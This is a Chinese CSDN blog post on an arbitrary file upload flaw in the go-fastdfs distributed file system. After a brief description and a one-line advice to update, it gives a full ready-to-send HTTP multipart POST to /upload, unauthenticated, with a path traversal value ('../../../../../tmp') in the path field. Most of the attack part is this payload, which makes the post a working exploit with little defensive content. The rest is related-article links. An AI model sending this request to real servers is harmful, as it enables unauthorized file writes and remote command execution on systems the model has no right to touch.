go-fastdfs 任意文件上传

最新推荐文章于 2024-09-13 21:43:34 发布
最新推荐文章于 2024-09-13 21:43:34 发布
阅读量1k 收藏 7
点赞数 7
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72372037/article/details/135817430
版权

漏洞描述

go-fastdfs是一个基于http协议的分布式文件系统,存在任意文件上传漏洞,未经身份验证的攻击者可以直接向系统上传任意文件,达到远程执行命令的目的。

解决建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。

POST /upload HTTP/1.1
Host: url
Content-Length: 891
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: application/octet-stream

success
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="scene"

default
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="filename"

test
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="output"

json2
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="path"

../../../../../tmp
------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="code"


------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="auth_token"


------WebKitFormBoundaryigj9M9EJykZc9u53
Content-Disposition: form-data; name="submit"

upload
------WebKitFormBoundaryigj9M9EJykZc9u53--
海绵宝宝救赎
关注
FastDFS分布式的文件系统从小白入门到企业实践打怪之路系列笔记 【运维实践】
WeiyiGeek 唯一极客IT知识分享
11-11 301
FastDFS分布式的文件系统从小白入门到企业实践打怪之路系列笔记 【运维实践】0.前言 Q: 传统的文件系统面临的问题与挑战? 描述: 在传统WEB应用中,前端、后端、以及其它API服务部署在同一台服务器,所有文件都作为静态资源访问,随着业务量的不断增长,久而久之,图片和文件等资源占用的空间变得越来越大。 随之带来了各种性能、管理与安全风险等问题,如下所示: 若文件直接置于应用服务器中,难以管理; 昂贵的磁盘空间、高性能服务器大大增加了运维成本; 易发生单点故障; 传统FTP上传文件,存在诸多安全
go-fastdfs 一个基于http协议的分布式文件系统
zhaomengxia123的博客
08-04 377
一、开源地址:二、下载。
文件上传-fastdfs
08-02
使用fastdfs上传文件
go-fastdfs 常见问题解决方案
最新发布
gitblog_07093的博客
09-13 497
go-fastdfs 常见问题解决方案 go-fastdfs go-fastdfs 是一个简单的分布式文件系统(私有云存储),具有无中心、高性能,高可靠,免维护等优点,支持断点续传,分块上传,小文件合并,自动同步,自动修复。Go-fastdfs is a simple distributed file system (p...
Go-fastdfs 任意文件上传(CVE-2023-1800)
失心少年
06-12 2582
在 sjqzhang go-fastdfs 1.4.3 之前发现了一个被归类为严重的漏洞。受此问题影响的是组件File Upload Handler的文件/group1/uploa的上传功能。操作导致路径遍历:‘…/filedir’。该漏洞已向公众披露并可能被使用。该漏洞的标识符为 VDB-224768。sjqzhang go-fastdfs 是一个开源分布式文件系统,专为存储和共享大文件而设计。它是用 Go 编写的,由开发者 sjqzhang 在 GitHub 上维护。
go-fastdfs 上传文件终极篇
全栈世界
12-23 4987
go-fastdfs已经搭建完成 那么开始java代码,走起: 1.首先建立一个文件上传工具类 package com.zyw.shows.util; import com.alibaba.fastjson.JSONObject; import com.zyw.shows.entity.PageData; import com.zyw.shows.mapper.FileMapper; import org.springframework.beans.factory.annotation.Autowired;
FastDFS+Nginx(单点部署)事例
人人都是程序员
01-05 214
关于FastDFS集群部署请见博文 FastDFS集群部署 FastDFS是由淘宝的余庆先生所开发,是一个轻量级、高性能的开源分布式文件系统,用纯C语言开发,包括文件存储、文件同步、文件访问(上传、下载)、存取负载均衡、在线扩容、相同内容只存储一份等功能,适合有大容量存储需求的应用或系统。做分布式系统开发时,其中要解决的一个问题就是图片、音视频、文件共享的问题,分布式文件系统正好可以解决...
通过Java代码上传 Go-FastDFS
Elegance never goes out of fashion
06-02 588
本文主要讲解通过 Hutool-http 模式实现java文件上传,其他模式可参考官网教程!
go-fastdfs漏洞
09-20
首先,由于go-fastdfs的设计初衷是快速的文件上传和下载,因此可能在安全性方面存在一些弱点。例如,由于缺乏严格的访问控制机制,未经授权的用户可能能够访问和下载存储在go-fastdfs上的文件。这可能导致敏感信息...
分布式文件系统FastDFS
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
09-08 6768
概述 FastDFS是一个开源的轻量级分布式文件系统,是我国一款开源的分布式文件系统 由阿里巴巴开发,其真题架构由跟踪服务器(tracker server)、存储服务器(storage server)和客户端(client)三个部分组成,主要解决了海量数据存储问题,特别适合以中小文件(建议范围:4KB < file_size <500MB)为载体的在线服务。 特点: 1>Fast......
探索效率与可扩展性:MinIO图片服 VS FastDFS图片服
凛鼕将至的博客
12-30 3089
Minio图片服是基于Minio对象存储系统构建的一个图片存储和管理系统。Minio是一个开源的对象存储系统,可通过API接口进行操作,支持分布式部署和高可用性。Minio图片服提供了一个简单易用的界面,用户可以通过该界面上传、下载、删除和查看图片。它还支持图片缩略图生成和图片处理功能,用户可以对上传的图片进行裁剪、旋转、调整大小等操作。Minio图片服还支持图片的标签和元数据管理。用户可以为每张图片添加标签,便于搜索和分类。同时,用户还可以为图片添加自定义的元数据,用于存储图片的相关信息。
分布式文件系统FastDFS看这一篇就够了(文件上传下载、单机部署及集群部署)
热门推荐
白大锅的博客,毕设WangLoveBai_999
09-18 8万+
FastDFS目录一、FastDFS是什么?1.1.简介1.2.结构组成(Client、Tracker server和Storage server)1.3.FastDFS下载安装教程1.4.目录结构二、FastDFS文件上传下载2.1.上传下载流程2.2.上传下载实现2.2.1.配置依赖:因为我们使用的maven来管理工程,所以,我们需要去配pom文件2.2.2.新建fdfs_client.conf文件,在我们的itoo中,我们建立在(src/main/resources底下)2.2.3.实现文件上传2.2
java使用okhttp3实现gofastdfs上传
qq_45503106的博客
09-01 584
1.maven <dependency> <groupId>com.squareup.okhttp3</groupId> <artifactId>okhttp</artifactId> <version>3.9.1</version> </dependency> <dependency&g
大文件传输(gofastdfs
大自然界的一颗沙子,它磨练久了会变成珍珠的。
05-27 5793
简介: 1、使用的是go-fast,支持大文件传输。 2、参考的资料:https://gitee.com/sjqzhang/go-fastdfs/blob/master/README-en.md 3、下载fileserver.exe 4、找到“断点续传示例”,点击“更多客户端请参考”,下载“tus-java-client” 5、copy里面的代码,放到web工程中 或者 使用idea通过git下载...
文件上传漏洞
zhaohong_bo的专栏
05-21 1156
mark,此博主写的很全面了:https://thief.one/2016/09/22/上传木马姿势汇总-欢迎补充/
文件上传
qq_41933598的博客
07-11 187
大文件
分布式文件系统FastDFS看这一篇就够了(文件上传下载、单机部署及集群部署)_go-fastdfs漏洞(2)
2401_84281629的博客
05-04 986
KaTeX parse error: Expected group after ‘_’ at position 18: …ase_path} |_̲_data | …{ip_addr}_${port}.mark:存放向目标服务器同步的完成情况| || |__一级目录:256个存放数据文件的目录,目录名为十六进制字符,如:00, 1F| |__二级目录:256个存放数据文件的目录,目录名为十六进制字符,如:0A, CF|__logs。
文件上传漏洞(二)
不秃头的程序Yang
05-19 807
一、任意文件上传漏洞 任意文件上传漏洞又名文件直接上传漏洞 这种漏洞危害极大,如果攻击者能直接上传恶意脚本到网站存放的目录,且这个目录可解析动态脚本语言,那么攻击者就能够 直接获取网站权限,甚至进一步权限提升,控制服务器。 ...
分布式文件系统FastDFS看这一篇就够了(文件上传下载、单机部署及集群部署)_go-fastdfs漏洞(1)
2401_84911309的博客
05-13 905
1.Client通过Tracker server查找可用的Storage server。2.Tracker server向Client返回一台可用的Storage server的IP地址和端口号。3.Client直接通过Tracker server返回的IP地址和端口与其中一台Storage server建立连接并进行文件上传。4.上传完成,Storage server返回Client一个文件ID,文件上传结束。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值